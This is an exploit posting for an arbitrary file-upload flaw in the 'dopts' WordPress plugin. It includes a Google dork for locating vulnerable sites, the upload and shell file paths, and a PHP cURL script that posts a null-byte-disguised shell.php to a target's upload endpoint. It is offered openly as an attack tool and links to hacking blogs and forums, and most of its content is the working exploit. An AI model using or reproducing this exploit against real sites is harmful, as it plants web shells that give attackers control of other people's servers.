################################################################################# # Exploit Title: Wordpress plugins dopts upload File Vulnerability # Author : sohaip-hackerDZ # Google Dork : inurl:/wp-content/plugins/dopts/ # Tested on : Linux # data : 2017-05-24 # Blog : http://www.tools-hack.com/ ################################################################################# # # # if msg : erorr # # [!] Exploit : 127.0.0.1/path/wp-content/plugins/dopts/libraries/php/upload.php # # [!] File Location : http:/127.0.0.1/path/wp-content/uploads/SHELL.php%205jpg # # [*] OR http:/127.0.0.1/path/wp-content/plugins/dopts/uploads/SHELL.php%205jpg # # # # # # [!] Exploit : ################################################################################## <?php $postData = array(); $postData['file'] = "@shell.php%2500jpg"; $sohaip = curl_init(); curl_setopt($sohaip, CURLOPT_URL, "http:/[target].com/wp-content/plugins/dopts/libraries/php/upload.php"); curl_setopt($sohaip, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0"); curl_setopt($sohaip, CURLOPT_POST, 1); curl_setopt($sohaip, CURLOPT_POSTFIELDS, $postData ); $dz = curl_exec ($sohaip); curl_close($sohaip); unset($sohaip); echo $dz; ?> ################################################################################# # ABOUT # Facebook : https://www.facebook.com/sohaipbarika # forum : http://spyhackerz.com/forum/ # Blog : http://www.tools-hack.com/ #################################################################################